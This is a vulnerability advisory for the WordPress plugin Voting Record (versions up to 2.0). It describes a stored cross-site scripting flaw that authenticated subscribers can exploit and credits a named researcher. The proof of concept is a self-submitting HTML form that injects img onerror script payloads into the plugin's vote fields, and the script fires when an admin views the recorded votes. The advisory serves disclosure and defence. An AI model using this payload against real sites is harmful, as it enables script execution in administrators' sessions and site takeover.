WordPress Plugin Vulnerabilities
Voting Record <= 2.0 - Subscriber+ Stored XSS
Description
The plugin is missing sanitisation as well as escaping, which could allow any authenticated users, such as subscriber to perform Stored XSS attacks
Proof of Concept
Have a subscriber open an HTML file containing the following: ``` <form action="http://localhost:8888/wordpress/wp-admin/index.php" method="POST"> <input type="text" name="bill" value="1"> <input type="text" name="description" value='subscriber"><img src=x onerror=alert(19)>'> <input type="text" name="vote" value="Yea"> <input type="text" name="voter" value='subscriber"><img src=x onerror=alert(20)>'> <input type="text" name="date" value="2022-12-10"> <input type="text" name="result" value="pass"> <input type="text" name="tally" value="3"> <input type="text" name="record_vote" value="Save"> </form> <script> document.forms[0].submit(); </script> ``` See the XSS when logged in as an admin and viewing recorded votes.
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-10 (about 4 months ago)
Added
2024-01-10 (about 4 months ago)
Last Updated
2024-01-10 (about 4 months ago)